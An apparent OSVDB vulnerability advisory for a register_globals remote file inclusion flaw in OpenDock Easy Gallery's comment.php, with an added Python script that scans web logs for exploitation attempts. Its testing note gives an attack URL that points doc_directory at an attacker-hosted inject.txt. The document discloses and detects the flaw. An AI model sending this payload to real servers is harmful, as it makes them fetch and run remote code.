OpenDock Easy Gallery sw/lib_comment/comment.php doc_directory Variable Remote File Inclusion

2006-10-09T07:50:00
ID OSVDB:29596
Type osvdb
Reporter Dedi Dwianto (the_day@echo.or.id)
Modified 2006-10-09T07:50:00

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/sw/lib_comment/comment.php?doc_directory=http://[attacker]/inject.txt?
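A defender can look for the request pattern above in web server access logs. The script below is an added example, not part of the original advisory: it assumes Common/Combined Log Format, treats any doc_directory value beginning with an http, https or ftp scheme as a remote include attempt, and runs over constructed sample lines. The function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path and parameter name are taken from the advisory.
VULN_PATH = "/sw/lib_comment/comment.php"
PARAM = "doc_directory"
# Assumption: a value that starts with a URL scheme is a remote include attempt.
REMOTE = re.compile(r"^(?:https?|ftp)://", re.I)
# Request field of a Common/Combined Log Format line.
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Oct/2006:07:50:00 +0000] "GET /gallery/sw/lib_comment/comment.php?doc_directory=http://files.example/inject.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [09/Oct/2006:07:51:12 +0000] "GET /gallery/sw/lib_comment/comment.php?doc_directory=HTTP%3A%2F%2Ffiles.example%2Fx.txt%3F HTTP/1.0" 200 498',
    '198.51.100.7 - - [09/Oct/2006:07:52:40 +0000] "GET /gallery/sw/lib_comment/comment.php?id=4 HTTP/1.1" 200 2048',
    '198.51.100.8 - - [09/Oct/2006:07:53:05 +0000] "GET /gallery/index.php?doc_directory=http://files.example/x HTTP/1.1" 404 0',
]

def flag_request(target):
    """Return the decoded doc_directory value when a request to comment.php
    supplies a remote URL in it, otherwise None."""
    parts = urlsplit(target)
    # Normalise encoded characters, duplicate slashes and case in the path.
    path = re.sub(r"/+", "/", unquote(parts.path)).lower()
    if not path.endswith(VULN_PATH):
        return None
    # parse_qsl percent-decodes once, as PHP does before populating globals.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM and REMOTE.match(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, injected_value) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        value = flag_request(m.group("target")) if m else None
        if value:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}  doc_directory={value}")
```

With register_globals on, the same variable can also be set from a POST body or a cookie, which access logs do not record, so an empty result does not rule out an attempt.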

References:

Vendor URL: http://web.opendock.net/
Security Tracker: 1017021
Secunia Advisory ID: 22337
Related OSVDB ID: 29589
Related OSVDB ID: 29591
Related OSVDB ID: 29597
Related OSVDB ID: 29592
Related OSVDB ID: 29593
Related OSVDB ID: 29595
Related OSVDB ID: 29590
Related OSVDB ID: 29594
Other Advisory URL: http://advisories.echo.or.id/adv/adv52-theday-2006.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0123.html
Keyword: ECHO_ADV_52$2006
ISS X-Force ID: 29417
Generic Exploit URL: http://www.milw0rm.com/exploits/2497
FrSIRT Advisory: ADV-2006-3969
CVE-2006-5241
Bugtraq ID: 20411